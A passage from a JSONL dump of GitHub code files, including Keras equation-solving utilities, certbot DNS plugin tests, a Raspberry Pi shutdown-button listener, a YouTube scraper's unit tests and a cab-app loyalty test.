revertBoolean:\r\n X_norm = min_max_scaler.fit_transform(X)\r\n Y_norm = min_max_scaler.transform(Y)\r\n return X_norm, Y_norm\r\n else:\r\n X = min_max_scaler.inverse_transform(X)\r\n Y = min_max_scaler.inverse_transform(Y)\r\n return X, Y\r\n\r\n\r\ndef spiltDatasetIntoTrainTest(X, Y):\r\n \"\"\"\r\n Se formeaza si se imparte setul de date pentru a putea fi antrenate pe modelul neuronal.\r\n 66.(6)% din setul de date va fi pentru antrenarea propriu-zisa.\r\n 33.(3)% din setul de date va fi pentru testarea modelului.\r\n :param X: Coefieicentii dependenti si independenti dupa reformatarea sistemelor.\r\n :param Y: Solutiile sistemelor de ecuatii.\r\n :return: Setul de date impartit pentru o antrenare corecta.\r\n \"\"\"\r\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.33, random_state=42)\r\n X_train = np.asarray(X_train)\r\n Y_train = np.asarray(Y_train)\r\n X_test = np.asarray(X_test)\r\n Y_test = np.asarray(Y_test)\r\n\r\n return X_train, X_test, Y_train, Y_test\r\n\r\n\r\ndef plot(history):\r\n \"\"\"\r\n Se creeaza numeroase grafice pe modelul retelei neuronale creat,\r\n :param history: reprezinta modelul retelei neuronale artificiale.\r\n :return: grafic pentru accuratetea atat pentru valorile de antrenare cat si cele de testare.\r\n grafic pentru functia de pierdere atat pentru valorile de antrenare cat si cele de testare.\r\n grafic pentru eroarea patratica medie atat pentru valorile de antrenare cat si cele de testare.\r\n Pe aceste grafice se poate vedea foarte usor daca modelul retelei neuronale este eficace/eficient sau nu.\r\n Accuratetea ar putea fi scrisa ca numarul de predictii corecte / numarul total de predictii, fiind cea importanta,\r\n se poate observa cum accuratetea creste la considerabil la fiecare \"Epoch\" - Iteratie prin setul de date. Ajungand\r\n la peste 85%.\r\n :param history: Datele legate de antrenarea modelului.\r\n :return: Diferite grafice asupra antrentarii modelului.\r\n \"\"\"\r\n plt.figure(1)\r\n\r\n # plt.subplot(1)\r\n # summarize history for accuracy\r\n plt.plot(history.history['accuracy'])\r\n plt.plot(history.history['val_accuracy'])\r\n plt.title('model accuracy')\r\n plt.ylabel('accuracy')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n plt.show()\r\n\r\n # plt.subplot(2)\r\n # summarize history for loss\r\n plt.plot(history.history['loss'])\r\n plt.plot(history.history['val_loss'])\r\n plt.title('model loss')\r\n plt.ylabel('loss')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n # plt.tight_layout()\r\n plt.show()\r\n\r\n # plt.subplot(3)\r\n plt.plot(history.history['mse'])\r\n plt.plot(history.history['val_mse'])\r\n plt.title('Mean squared error')\r\n plt.ylabel('mse')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n plt.show()\r\n\r\n\r\ndef plottingModelPNG(model):\r\n \"\"\"\r\n Se creeaza arhitectura modelului retelei neuronale de tip feedforward. Se afiseaza numarul de straturi si structura\r\n acestora, numarul de neuroni la fiecare strat. 
De asemenea, se poate observa cand se aplica flatten() si dropout().\r\n :param model: Modelul retelei neuronale creat.\r\n :return: Un PNG cu arhitectura acestui model.\r\n \"\"\"\r\n tf.keras.utils.plot_model(\r\n model, to_file='model.png', show_shapes=True, show_dtype=True,\r\n show_layer_names=True, rankdir='TB', expand_nested=False, dpi=96\r\n )\r\n\r\n\r\ndef raggedTensorChecker(X, Y):\r\n \"\"\"\r\n Daca sistemele din setul de date au rangul diferit, pentru a fi date valide pentru a intra in modelul neuronal,\r\n acestea trebuie transformate in ragged tensors. Altfel spus, inainte de a se apela flatten() pe datele de intrare,\r\n toate sistemele se vor transforma in rangul cel mai mare, iar coeficientii lipsa se vor inlocui cu 0. Trebuie sa\r\n intre un\r\n :param X: Modelul retelei neuronale creat.\r\n :param Y: Modelul retelei neuronale creat.\r\n :return: X,Y transformati in constant ragged tensors.\r\n \"\"\"\r\n print(\"First input data X:\", X[1])\r\n print(\"First output data Y:\", Y[1])\r\n\r\n X = np.array([np.array(val) for val in X])\r\n Y = np.array([np.array(val) for val in Y])\r\n X, Y = shuffle(X, Y, random_state=0)\r\n\r\n print(\"Y[0] - Dataset\", Y[0])\r\n print(\"Y[1] - Dataset\", Y[1])\r\n\r\n X = tf.ragged.constant(X)\r\n Y = tf.ragged.constant(Y)\r\n\r\n print(\"Y[0] SHAPE - DatasetRAGGED\", Y[0].shape)\r\n print(\"Y[1] SHAPE - DatasetRAGGED\", Y[1].shape)\r\n X = X.to_tensor()\r\n Y = Y.to_tensor()\r\n print(\"X[0] SHAPE - DatasetRAGGED - same length\", X[0].shape, X[0])\r\n print(\"X[5] SHAPE - DatasetRAGGED - same length\", X[5].shape, X[5])\r\n print(\"Y[0] SHAPE - DatasetRAGGED - same length\", Y[0].shape, Y[0])\r\n print(\"Y[5] SHAPE - DatasetRAGGED - same length\", Y[5].shape, Y[5])\r\n\r\n return X, Y\r\n\r\n\r\ndef plotMatricesLens(Y):\r\n \"\"\"\r\n Se va crea un grafic cu numarul de sisteme in functie de rangul sau.\r\n @param Y: o matrice cu solutiile sistemelor de ecuatii.\r\n @return:\r\n \"\"\"\r\n dictionaryArray = {}\r\n\r\n for row in Y:\r\n dictionaryArray[len(row)] = dictionaryArray.get(len(row), 0) + 1\r\n\r\n pd.DataFrame(dictionaryArray, index=['Rang matrice']).plot(kind='bar')\r\n\r\n plt.show()\r\n\r\n\r\ndef splitTrainTestForVariousRanksDataset(X, Y):\r\n \"\"\"\r\n Pentru sistemele care sunt stocate in acelasi set de date, indiferent de rangul matriciilor, sistemele se vor\r\n imparti intr-un mod diferit in training - testing data. 80% pentru antrenare, 20% pentru testare.\r\n @param X: Coeficientii dependenti - independenti\r\n @param Y: Solutiile\r\n @return: Set de date pentru antrenare si testare.\r\n \"\"\"\r\n X_train = X[:-20]\r\n X_test = X[-20:]\r\n\r\n Y_train = Y[:-20]\r\n Y_test = Y[-20:]\r\n\r\n return X_train, X_test, Y_train, Y_test\r\n\r\n\r\ndef predictionAndEvaluationOfTheModel(model, X_test, Y_test):\r\n \"\"\"\r\n Dupa ce modelul neuronal este antrenat, se vor face predictii pe setul de date pentru testare. 
Se vor afisa\r\n adevaratele valori dar si predictiile acestora.\r\n @param model: Modelul neuronal antrenat.\r\n @param X_test: Coeficientii dependenti si independenti (setul de date pentru testare).\r\n @param Y_test: Solutiile sistemelor (setul de date pentru testare).\r\n @return: Se afiseaza adevaratele solutii si predictiile modelului neuronal.\r\n \"\"\"\r\n print(\"Coeficientii sistemului\")\r\n print(X_test)\r\n\r\n print(\"Evaluarea Modelului Antrenat: \")\r\n score = model.evaluate(X_test, Y_test, verbose=0)\r\n print('Test loss:', score[0])\r\n print('Test accuracy:', score[1])\r\n\r\n print(\"Predictia modelului ... \\n--- Predictiile ---\")\r\n print(model.predict(X_test))\r\n print(\"--- Adevaratele valori ---\")\r\n print(Y_test)\r\n\r\n\r\ndef saveAndTestNeuralNetworkModel(model, X_train, Y_train, X_test):\r\n \"\"\"\r\n Se va salva modelul retelei neuronale pentru a putea fi folosit in viitor.\r\n @param model:Modelul neuronal antrenat.\r\n @param X_train: Coeficientii dependenti si independenti 80% (setul de date pentru antrenare).\r\n @param Y_train: Solutiile sistemelor 80% (setul de date pentru antrenare).\r\n @param X_test: Coeficientii dependenti si independenti (setul de date pentru testare).\r\n @return: Model neuronal salvat, acesta se va putea folosi in viitor.\r\n \"\"\"\r\n print(\"Se salveaza modelul in fisierul: saved neural network din folder-ul neural network models results\")\r\n model.save(\"neural network models results/saved neural network\")\r\n reconstructed_model = tf.keras.models.load_model(\"neural network models results/saved neural network\")\r\n print(\"Se verifica egalitatea modelului original cu cel reconstruit.\")\r\n np.testing.assert_allclose(model.predict(X_test), reconstructed_model.predict(X_test))\r\n print(\"Modelul reconstruit este deja compilat si a retinut optimizatorul corespunzator. Antrenamentul se va relua:\")\r\n reconstructed_model.fit(X_train, Y_train)\r\n\r\n\r\ndef testNeuralModelOutputWriteToCsvRealAndPredictedSolutions(testDataset, isItMultiRank, fileName, predicting):\r\n \"\"\"\r\n Se vor stoca solutiile exacte si cele calculate de modelul neuronal in fisiere, pentru a putea compara rezultatele.\r\n @param testDataset: Solutiile sistemelor, rezultatele exacte sau cele prezise de modelul neuronal.\r\n @param isItMultiRank: isItMultiRank = True, daca se vor stoca, mai multe sisteme, indiferent de rang in acelasi set\r\n de date, isItMultiRank = False altfel.\r\n @param fileName: numele fisierului, diferite in functie de algoritm si daca se prezic sau nu solutiile.\r\n @param predicting: boolean care specifica in care fisier trebuie scrise rezultatele. 
predicting = True semnifica\r\n faptul ca modelul va prezice solutiile si se vor stoca intr-un fisier specific, iar daca predicting = False, atunci\r\n se vor stoca adevaratele valori intr-un fisier (Real Solutions).\r\n @return: Scrierea in fisiere a solutiilor exacte si predictia solutiilor (generate de modelul neuronal.\r\n \"\"\"\r\n if predicting:\r\n f = open('neural network models results/Predicted Solutions ' + fileName, 'w+')\r\n else:\r\n f = open('neural network models results/Real Solutions ', 'w+')\r\n\r\n if isItMultiRank:\r\n header = ['Solutie 1', 'Solutie 2', 'Solutie 3', 'Solutie 4', 'Solutie 5', '...', 'Solutie n']\r\n else:\r\n header = ['Solutie 1', 'Solutie 2']\r\n data = []\r\n writer = csv.writer(f)\r\n writer.writerow(header)\r\n for row in testDataset:\r\n for value in row:\r\n data.append(value)\r\n writer.writerow(data)\r\n data = []\r\n f.close()\r\n\r\n\r\ndef sklearnOutputResults(regressor, X_test, Y_test, algorithm):\r\n \"\"\"\r\n Metoda ajutor pentru \"sklearnModelsUtil\", afiseaza informatii despre modelul neuronal cum ar fi: mae,mse,rmse.\r\n Se vor incerca mai multe modele neuronale (deja implementate, folosite din libraria SKLearn).\r\n @param regressor: modelul retelei neuronale.\r\n @param X_test: Coeficientii dependenti si independenti ai sistemului.\r\n @param Y_test: Solutiile sistemelor de ecuatii.\r\n @param algorithm: numele algoritmului implementat de libraria SKLearn.\r\n @return: Afisarea unor proprietati ale modelelor din SKLearn\r\n \"\"\"\r\n print(algorithm + \" SKLearn Model\")\r\n print(\"Rezultatele modelului neuronal SKLearn (\" + algorithm + \") au fost scrise in fisier\")\r\n print('Mean Absolute Error' + algorithm + ' :',\r\n metrics.mean_absolute_error(Y_test, regressor.predict(X_test)))\r\n print('Mean Squared Error ' + algorithm + ' :', metrics.mean_squared_error(Y_test, regressor.predict(X_test)))\r\n print('Root Mean Squared Error' + algorithm + ' :',\r\n np.sqrt(metrics.mean_squared_error(Y_test, regressor.predict(X_test))))\r\n\r\n\r\ndef sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, algorithm, isItMultiRank):\r\n \"\"\"\r\n Metoda suport pentru sklearnNeuralNet, se afiseaza date despre modelele neuronale din libraria SKLearn.\r\n Se vor afisa predictiile solutiilor si solutiile exacte ale sistemelor de ecuatii.\r\n @param regressor: modelul neuronal al retelei artificial.\r\n @param X_train: Coeficientii dependenti - independenti din setul de date pentru antrenare.\r\n @param Y_train: Solutiile din setul de date pentru antrenare.\r\n @param X_test: Coeficientii dependenti - independenti din setul de date pentru testare.\r\n @param Y_test: Solutiile din setul de date pentru testare.\r\n @param algorithm: numele algoritmului din libraria SKLearn\r\n @return: date despre un model neuronal dat din libraria SKLearn.\r\n \"\"\"\r\n regressor.fit(X_train, Y_train)\r\n print(regressor.score(X_train, Y_train))\r\n print(regressor.coef_)\r\n print(regressor.intercept_)\r\n testNeuralModelOutputWriteToCsvRealAndPredictedSolutions(regressor.predict(X_test), isItMultiRank,\r\n \"SKLearn \" + algorithm + \" model\", True)\r\n testNeuralModelOutputWriteToCsvRealAndPredictedSolutions(Y_test, isItMultiRank, \"SKLearn \" + algorithm + \" model\", False)\r\n sklearnOutputResults(regressor, X_test, Y_test, algorithm)\r\n\r\n\r\ndef sklearnNeuralNet(X_train, Y_train, X_test, Y_test, isItMultiRank):\r\n \"\"\"\r\n Aplica diferite modele neuronale din libraria SKLearn - care rezolva regressii pe setul de date.\r\n @param 
X_train: Coeficientii dependenti - independenti din setul de date pentru antrenare.\r\n @param Y_train: Solutiile din setul de date pentru antrenare.\r\n @param X_test: Coeficientii dependenti - independenti din setul de date pentru testare.\r\n @param Y_test: Solutiile din setul de date pentru testare.\r\n @return: diferite modele neuronale care rezolva regresii din libraria SKLearn.\r\n \"\"\"\r\n X_train = X_train.reshape(X_train.shape[0], -1)\r\n X_test = X_test.reshape(X_test.shape[0], -1)\r\n\r\n # LinearRegression\r\n regressor = LinearRegression()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"LinearRegression\",isItMultiRank)\r\n\r\n # ElasticNet\r\n regressor = ElasticNet()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"ElasticNet\",isItMultiRank)\r\n\r\n\r\n \"\"\"\r\n X_train = X_train.flatten().reshape(-1,1)\r\n X_test = X_test.flatten().reshape(-1,1)\r\n Y_train = Y_train.flatten().reshape(-1,1)\r\n Y_test = Y_test.flatten().reshape(-1,1)\r\n\r\n\r\n # SVR\r\n regressor = SVR()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"SVR\")\r\n\r\n # SGDRegressor\r\n regressor = SGDRegressor()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"SGDRegressor\")\r\n\r\n # KernelRidge\r\n regressor = KernelRidge()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"KernelRidge\")\r\n\r\n # BayesianRidge\r\n regressor = BayesianRidge()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"BayesianRidge\")\r\n\r\n # GradientBoostingRegressor\r\n regressor = GradientBoostingRegressor()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"GradientBoostingRegressor\")\r\n \"\"\"","repo_name":"adrianpal123/licenta","sub_path":"Varianta Finala Licenta/NeuralNetUtil.py","file_name":"NeuralNetUtil.py","file_ext":"py","file_size_in_byte":17575,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"33171331878","text":"import pytest\nfrom certbot_dns_glesys import DomainParts, GlesysAuthenticator, GlesysRecord\nfrom unittest.mock import MagicMock\n\n\n# This config just sets all parameters to some value. It's just to make sure\n# that the DNSAuthenticator constructor has all the parameters it might need\nclass PluginConfig:\n verb = \"certonly\"\n config_dir = \"/tmp/cfg\"\n work_dir = \"/tmp/work\"\n logs_dir = \"tmp/log\"\n cert_path = \"./cert.pem\"\n fullchain_path = \"./chain.pem\"\n chain_path = \"./chain.pem\"\n server = \"https://acme-v02.api.letsencrypt.org/directory\"\n\n\nclass GlesysTestAuthenticator(GlesysAuthenticator):\n def __init__(self, client):\n super().__init__(config=PluginConfig, name=\"dns-glesys\")\n self._test_client = client\n def _get_glesys_client(self):\n return self._test_client\n\n\n@pytest.mark.parametrize(\"full_domain\", [\n \"runfalk.se\",\n \"*.runfalk.se\",\n \"acme-v02.api.letsencrypt.org\",\n])\ndef test_domain_parts_init(full_domain):\n d = DomainParts(full_domain)\n assert d.domain == full_domain\n assert d.subdomain is None\n\n\ndef test_domain_parts_iter_variants():\n d = DomainParts(\"*.runfalk.se\")\n expected_variants = {\n d,\n DomainParts(\"runfalk.se\", \"*\"),\n DomainParts(\"se\", \"*.runfalk\"),\n }\n assert set(d.iter_variants()) == expected_variants\n\n\ndef test_domain_parts_iter_variants_complex():\n d = DomainParts(\"acme-v02.api.letsencrypt.org\")\n expected_variants = {\n d,\n DomainParts(\"api.letsencrypt.org\", \"acme-v02\"),\n DomainParts(\"letsencrypt.org\", \"acme-v02.api\"),\n DomainParts(\"org\", \"acme-v02.api.letsencrypt\"),\n }\n assert set(d.iter_variants()) == expected_variants\n\n\ndef test_perform_cleanup_cycle():\n domain = \"*.runfalk.se\" # Unused\n validation_domain = \"_acme-challenge.runfalk.se\"\n validation_key = \"thisgoesinthetetxtrecord\"\n\n glesys_mock = MagicMock()\n def split_domain(d):\n assert d == validation_domain\n return DomainParts(\"runfalk.se\", \"_acme-challenge\")\n glesys_mock.split_domain.side_effect = split_domain\n\n auth = GlesysTestAuthenticator(glesys_mock)\n auth._perform(domain, validation_domain, validation_key)\n glesys_mock.add_record.assert_called_with(\n domain=\"runfalk.se\",\n subdomain=\"_acme-challenge\",\n type=\"TXT\",\n data=validation_key,\n ttl=auth.ttl,\n )\n\n record_id = 20200411\n glesys_mock.list_records.return_value = [\n GlesysRecord(record_id, \"runfalk.se\", \"_acme-challenge\", \"TXT\", validation_key, auth.ttl),\n ]\n auth._cleanup(domain, validation_domain, validation_key)\n glesys_mock.remove_record.assert_called_with(record_id)\n","repo_name":"runfalk/certbot-dns-glesys","sub_path":"test_certbot_dns_glesys.py","file_name":"test_certbot_dns_glesys.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"}
+{"seq_id":"39866922196","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution(object):\n def maxDepth(self, root):\n \"\"\"\n :type root: Node\n :rtype: int\n \"\"\"\n if root == None:\n return 0\n max_depth = 0\n stack = deque([(root,1)])\n \n while stack:\n node,depth = stack.pop()\n max_depth = max(max_depth,depth)\n children = node.children\n for child in children:\n stack.append((child,depth + 1))\n return max_depth\n \n \n \n \n \n ","repo_name":"Ephrem-shimels21/Competitive-Programming","sub_path":"0559-maximum-depth-of-n-ary-tree/0559-maximum-depth-of-n-ary-tree.py","file_name":"0559-maximum-depth-of-n-ary-tree.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12719334509","text":"#!/usr/bin/env python3\n\nimport pigpio\nimport atexit\nimport time\nimport os\nimport sys\n\ngpio = 3\npi = pigpio.pi()\nif not pi.connected:\n print(\"Error: pigpio is not connected. Likely pigpiod is not running.\")\n sys.exit(1)\n\ndef cleanup():\n global pi\n if pi:\n pi.stop()\n pi = None\n\natexit.register(cleanup)\n\npi.set_mode(gpio, pigpio.INPUT)\npi.set_pull_up_down(gpio, pigpio.PUD_UP)\n\nshutdown_counter = 0\n\ndef shutdown_confirmed():\n print(\"Shutdown confirmed\")\n # ensure clean exit\n os.system(\"sudo shutdown -h now\")\n exit()\n\ndef shutdown(gpioIn, level, tick):\n global shutdown_counter\n if gpioIn != gpio:\n exit(1)\n # pull-up logic, normally high, button goes low\n if level == 1:\n shutdown_counter = 0\n else:\n if shutdown_counter == 0:\n shutdown_counter = 1\n\n#pi.set_noise_filter(gpio, 1000, 5000)\ncallback=pi.callback(gpio, pigpio.EITHER_EDGE, shutdown)\n\ntry:\n print(\"Begin shutdown listener\")\n while 1:\n time.sleep(3)\n # shutdown has begun\n if shutdown_counter > 0:\n if shutdown_counter == 1:\n # 1 sleep iteration has passed\n shutdown_counter += 1\n else:\n # 6 seconds have passed\n shutdown_confirmed()\n\nexcept KeyboardInterrupt:\n print(\"\\nExiting shutdown button listener.\")\n exit()\n\nexcept:\n print(\"An unknown error has occured.\")\n\nfinally:\n print(\"End program safe cleanup.\")\n if pi:\n pi.stop()\n pi = None\n","repo_name":"Funmungus/scripts","sub_path":"pi/shutdown_listener.py","file_name":"shutdown_listener.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"38923869893","text":"\"\"\"\n@author : Tien Nguyen\n@date : 2023-05-21\n\"\"\"\n\nimport datetime\n\ndef get_time_now():\n now = datetime.datetime.now()\n return (now.year, now.month, now.day, now.hour, now.minute, now.second)\n\ndef create_report_dir():\n now = get_time_now()\n report_dir = \"\"\n for item in now[:-1]:\n report_dir += str(item)\n report_dir += str(now[-1])\n return report_dir\n","repo_name":"NguyenAnhTien/FLTutorial","sub_path":"src/utils/datetime.py","file_name":"datetime.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"39679571679","text":"import os\nimport django\nfrom menu_app.models import Menu, Item\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings')\ndjango.setup()\n\nmenu = Menu.objects.create(title=\"Menu 8\")\n\n# Создаем элементы меню с 10 уровнями вложенности\nparent_item = None\nfor i in range(1, 11):\n item = Item.objects.create(menu=menu, title=f\"Item {i}b\", parent=parent_item, slug=f\"item{i}b\")\n parent_item = item\n","repo_name":"Miki323/test_menu","sub_path":"add_in_db.py","file_name":"add_in_db.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"23129895432","text":"import os\nimport sys\n\nsys.path.append('.')\nsys.path.append('../')\nimport unittest\n\nimport pytest\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport scrapper as sc\n\n# Test command line\nclass TestMain(unittest.TestCase) :\n\n #Test constructor\n def test_init(self):\n argv = ['scrapper.py', '--output', 'outputtest.json', '--input', 'inputtest.json']\n self.assertEqual(sc.main(argv), 1)\n\n# Test File manager :\n\nclass TestFileManager(unittest.TestCase) :\n\n #Test constructor\n def test_init(self):\n input_file = \"inputtest.json\"\n output_file = \"outputtest.json\"\n manager = sc.FilesManager(input_file, output_file)\n self.assertEqual(manager.input_file, input_file)\n self.assertEqual(manager.output_file, output_file)\n\n # Test read\n def test_read(self):\n input_file = \"inputtest.json\"\n output_file = \"outputtest.json\"\n data = sc.FilesManager(\"inputtest.json\", output_file).read()\n self.assertEqual(data,{'videos_id' : ['fmsoym8I-3o', 'JhWZWXvN_yo']}) \n\n # Test save\n def test_save(self):\n data = {'videos_id' : ['fmsoym8I-3o', 'JhWZWXvN_yo']}\n videos = [sc.Video(id='fmsoym8I-3o', title='Pierre Niney : L’interview face cachée par HugoDécrypte', author='HugoDécrypte', likes=0, description=\"🍿 L'acteur Pierre Niney est dans L’interview face cachée ! Ces prochains mois, le format revient plus fort avec des artistes, sportifs, etc.🔔 Abonnez-vous ...\", links=[], comments=[]), sc.Video(id='JhWZWXvN_yo', title='ELISE LUCET EST SUB CHEZ MOI ?! (Débrief Cash Investigation)', author='ZeratoR', likes=0, description='ABONNE TOI, par pitié : https://www.youtube.com/user/ZeratoRSC2/?sub_confirmation=1Retrouvez-moi en live sur : https://www.twitch.tv/zeratorVOD du live : htt...', links=['https://www.youtube.com', 'https://www.twitch.tv'], comments=[])]\n input_file = \"inputtest.json\"\n output_file = \"outputtest.json\"\n sc.FilesManager(input_file, output_file).save(data,videos)\n self.assertTrue(os.path.exists(output_file) and os.path.getsize(output_file)!=0) \n\n\n# Tests Scrapper :\n\nclass TestScrapper(unittest.TestCase) : \n\n #Test constructor\n def test_init(self):\n data = { \"videos_id\" : [ \"fmsoym8I-3o\", \"JhWZWXvN_yo\" ] }\n scrapper = sc.Scrapper(data[\"videos_id\"])\n self.assertEqual(scrapper.list_id_vid, data[\"videos_id\"])\n\n # Test Find title\n def test_find_title(self):\n data = { \"videos_id\" : [ \"fmsoym8I-3o\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=fmsoym8I-3o\")\n soup = BeautifulSoup(req.content, 'html.parser')\n title = sc.Scrapper(data[\"videos_id\"]).find_title(soup)\n self.assertEqual(title, \"Pierre Niney : L\\u2019interview face cach\\u00e9e par HugoD\\u00e9crypte\" )\n\n def test_find_title_null(self):\n data = { \"videos_id\" : [ \"000000\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=000000\")\n soup = BeautifulSoup(req.content, 'html.parser')\n title = sc.Scrapper(data[\"videos_id\"]).find_title(soup)\n self.assertEqual(title,\"\")\n\n # Test Find author\n def test_find_author(self):\n data = { \"videos_id\" : [ \"fmsoym8I-3o\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=fmsoym8I-3o\")\n soup = BeautifulSoup(req.content, 'html.parser')\n author = sc.Scrapper(data[\"videos_id\"]).find_author(soup)\n self.assertEqual(author, \"HugoD\\u00e9crypte\")\n\n def test_find_author_null(self):\n data = { \"videos_id\" : [ \"000000\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=000000\")\n soup = BeautifulSoup(req.content, 'html.parser')\n author = 
sc.Scrapper(data[\"videos_id\"]).find_author(soup)\n self.assertEqual(author, \"\")\n \n # Test Find description \n def test_find_description(self):\n data = { \"videos_id\" : [ \"JhWZWXvN_yo\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=JhWZWXvN_yo\")\n soup = BeautifulSoup(req.content, 'html.parser')\n desc = sc.Scrapper(data[\"videos_id\"]).find_description(soup)\n self.assertEqual(desc,\"ABONNE TOI, par piti\\u00e9 : https://www.youtube.com/user/ZeratoRSC2/?sub_confirmation=1Retrouvez-moi en live sur : https://www.twitch.tv/zeratorVOD du live : htt...\")\n\n def test_find_description_null(self):\n data = { \"videos_id\" : [ \"000000\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=000000\")\n soup = BeautifulSoup(req.content, 'html.parser')\n desc = sc.Scrapper(data[\"videos_id\"]).find_description(soup)\n self.assertEqual(desc, \"\")\n\n # Test find_links\n def test_find_links(self):\n data = { \"videos_id\" : [ \"JhWZWXvN_yo\"] }\n description = \"ABONNE TOI, par piti\\u00e9 : https://www.youtube.com/user/ZeratoRSC2/?sub_confirmation=1Retrouvez-moi en live sur : https://www.twitch.tv/zeratorVOD du live : htt...\"\n links = sc.Scrapper(data[\"videos_id\"]).find_links(description)\n print(links)\n self.assertEqual(links,['https://www.youtube.com/user/ZeratoRSC2/?sub_confirmation=1Retrouvez-moi', 'https://www.twitch.tv/zeratorVOD'])\n\n def test_find_links_null(self):\n data = { \"videos_id\" : [ \"000000\"] }\n description = \"\"\n links = sc.Scrapper(data[\"videos_id\"]).find_links(description)\n self.assertEqual(links, [])\n\n # Test Scrap\n def test_find_scrap(self):\n data = { \"videos_id\" : [\"fmsoym8I-3o\",\"JhWZWXvN_yo\",\"vcORt-798EU\",\"dV360CxA2BQ\",\"000000\"]}\n result = sc.Scrapper(data[\"videos_id\"]).scrap()\n self.assertEqual(len(result), len(data[\"videos_id\"]))\n\n\n\n\n# Test conditions\n\n","repo_name":"trujillola/ScrappingYT","sub_path":"tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"34572256886","text":"from datetime import datetime\nfrom typing import List\nfrom unittest import TestCase\n\nimport pytz\nfrom dateutil.relativedelta import relativedelta\nfrom fastapi_events import middleware_identifier\nfrom freezegun import freeze_time\nfrom mockito import when, ANY\n\nfrom cabs_application import CabsApplication\nfrom config.app_properties import AppProperties\nfrom core.database import create_db_and_tables, drop_db_and_tables\nfrom crm.client import Client\nfrom loyalty.awarded_miles import AwardedMiles\nfrom loyalty.awards_account_repository import AwardsAccountRepositoryImp\nfrom loyalty.awards_service import AwardsService\nfrom loyalty.awards_service_impl import AwardsServiceImpl\nfrom geolocation.geocoding_service import GeocodingService\nfrom money import Money\nfrom pricing.tariff import Tariff\nfrom pricing.tariffs import Tariffs\n\nfrom tests.common.fixtures import DependencyResolver, Fixtures\n\ndependency_resolver = DependencyResolver()\n\n\nclass TestRemovingAwardMilesIntegration(TestCase):\n TRANSIT_ID: int = 1\n\n DAY_BEFORE_YESTERDAY = datetime(1989, 12, 12, 12, 12).astimezone(pytz.utc)\n YESTERDAY = DAY_BEFORE_YESTERDAY + relativedelta(days=1)\n TODAY = YESTERDAY + relativedelta(days=1)\n SUNDAY = datetime(1989, 12, 17, 12, 12).astimezone(pytz.utc)\n\n awards_service: AwardsService = dependency_resolver.resolve_dependency(AwardsServiceImpl)\n awards_account_repository: AwardsAccountRepositoryImp = dependency_resolver.resolve_dependency(\n AwardsAccountRepositoryImp)\n fixtures: Fixtures = dependency_resolver.resolve_dependency(Fixtures)\n app_properties: AppProperties = dependency_resolver.resolve_dependency(AppProperties)\n geocoding_service: GeocodingService = dependency_resolver.resolve_dependency(GeocodingService)\n tariffs: Tariffs = dependency_resolver.resolve_dependency(Tariffs)\n\n async def setUp(self):\n create_db_and_tables()\n app = CabsApplication().create_app()\n middleware_identifier.set(app.middleware_stack.app._id)\n\n async def test_by_default_remove_oldest_first_even_when_they_are_non_expiring(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n middle: AwardedMiles = self.granted_miles_that_will_expire_in_days(10, 365, self.YESTERDAY, client)\n youngest: AwardedMiles = self.granted_miles_that_will_expire_in_days(10, 365, self.TODAY, client)\n oldest_non_expiring_miles: AwardedMiles = self.granted_non_expiring_miles(5, self.DAY_BEFORE_YESTERDAY, client)\n\n # when\n with freeze_time(self.DAY_BEFORE_YESTERDAY):\n self.awards_service.remove_miles(client.id, 16)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(oldest_non_expiring_miles, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(middle, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(youngest, 9, awarded_miles)\n\n async def test_should_remove_oldest_miles_first_when_many_transits(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n when(self.tariffs).choose(ANY).thenReturn(Tariff(km_rate=0, name=\"fake\", base_fee=Money(10)))\n self.fixtures.client_has_done_transits(client, 15, self.geocoding_service)\n # and\n oldest = self.granted_miles_that_will_expire_in_days(10, 60, self.DAY_BEFORE_YESTERDAY, client)\n middle = 